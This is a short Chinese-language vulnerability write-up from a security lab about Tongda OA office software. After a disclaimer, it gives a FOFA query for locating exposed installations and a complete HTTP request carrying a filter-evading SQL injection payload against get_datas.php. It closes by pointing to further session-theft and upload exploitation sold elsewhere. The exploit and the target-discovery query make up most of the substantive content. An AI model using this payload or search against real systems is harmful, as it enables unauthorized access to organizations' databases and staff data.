0x01 阅读须知

SCA御盾实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 漏洞描述

（一） 通达oa

通达OA（Office Automation）是一款企业级协同办公软件，旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能，包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用，可以实现随时随地办公，提高工作效率和协作能力。同时，它还具备高度可定制性和扩展性，可以根据企业的实际需求进行定制开发，满足企业的个性化需求。通达OA广泛应用于各类企业，帮助企业实现数字化转型，提高管理效率和竞争力。

FOFA语法：

app="TDXK-通达OA"

（二） 漏洞复现

GET /general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20user(),database()%20fr\om%20user%20whe\re%201\={`=`%201})--%20%27 HTTP/1.1Host: {{HostName}}Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Length: 2

后续利用(获取session+后台上传)+漏洞exp脚本发布在知识星球